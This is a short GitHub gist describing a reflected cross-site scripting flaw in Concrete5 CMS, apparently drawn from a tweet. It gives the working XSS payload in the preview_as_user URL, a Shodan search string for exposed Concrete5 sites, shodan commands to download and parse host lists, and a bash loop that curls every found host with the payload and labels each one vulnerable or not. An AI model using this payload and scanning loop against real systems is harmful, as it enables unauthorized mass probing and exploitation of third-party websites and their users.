Forked from simrotion13/Concrete5 CMS XSS vulnerability
Created
March 16, 2023 22:46
-
-
Save ruevaughn/a77fbc5aaec83d7e71bc16370e4b402e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Concrete5 CMS XSS vulnerability tweet by Jackson | |
| Shodan Dork : 'Set-Cookie: CONCRETE5' | |
| Vulnerable URL : | |
| https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)> | |
| By using below URL we can download the results. ( Shodan Premium API Key is needed ) | |
| shodan download concrete5 'Set-Cookie: CONCRETE5' | |
| I already downlaod the results using shodan cli command | |
| We will seperate the IP:PORT from shodan results. For this we will use shodan parse command along with awk | |
| shodan parse concrete5.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a shodan-ip.txt | |
| We will using below process to automate the findings | |
| cat shodan-ip.txt | while read host do ; do curl --silent --path-as-is --insecure "https://$host/ccm/system/panels/page/preview_as_user/preview?cID=%22%3E%3C/iframe%3E%3Cimg/src/onerror=.1|alert(document.domain)%3E" | grep -qs '"></iframe><img/src/onerror=.1|alert(document.domain)>' && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done | |
| Check the Vulnerable URL |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment